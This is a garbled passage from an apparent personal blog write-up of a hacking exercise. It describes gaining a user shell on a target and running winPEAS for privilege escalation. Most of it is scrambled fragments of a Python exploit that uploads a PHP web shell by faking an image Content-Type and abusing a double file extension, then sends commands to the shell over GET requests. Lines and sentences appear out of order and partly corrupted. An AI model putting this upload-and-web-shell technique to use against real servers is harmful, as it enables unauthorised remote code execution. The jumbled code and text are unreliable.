![]() I used a tool called winPEAS, this tool scans the machine looking for vulnerable processes and unprotected files. Getting user access was easy, now I needed root, to privilege escalate I tried a lot of thing but none of the worked, I’m only going to share what worked. ![]() R1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)Īfter downloading the script and importing all the necessary libraries for python2.7 I ran the exploit and got user shell. Print formatHelp("( ) Example:\t python %s ''" % sys.argv) Print formatHelp("( ) Usage:\t python %s " % sys.argv) Return Style.BRIGHT Fore.RED STRING Fore.RESET R2 = requests.get(WEB_SHELL, params=command, verify=False) Term = Style.BRIGHT Fore.GREEN cwd Fore.RESET Print(Fore.GREEN ' ' Fore.RESET 'Successfully connected to webshell.') Print Style.BRIGHT Fore.RED " " Fore.RESET "Could not connect to the webshell." Style.RESET_ALL R2 = session.get(WEB_SHELL, params=getdir, verify=False) WEB_SHELL = SERVER_URL 'upload/kamehameha.php' Communicate with the webshell at '/upload.php?id=kamehameha' using GET Requests with the telepathy parameter. Therefor $conv='kaio-ken' $conv='php' $conv='png' The Web Application will rename the file to have the extension with the second item in an array created from the file name seperated by the '.' character. In the body of the 'file' parameter of the POST request, insert the malicious PHP code: Bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' paramter to 'upload'. # 14
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |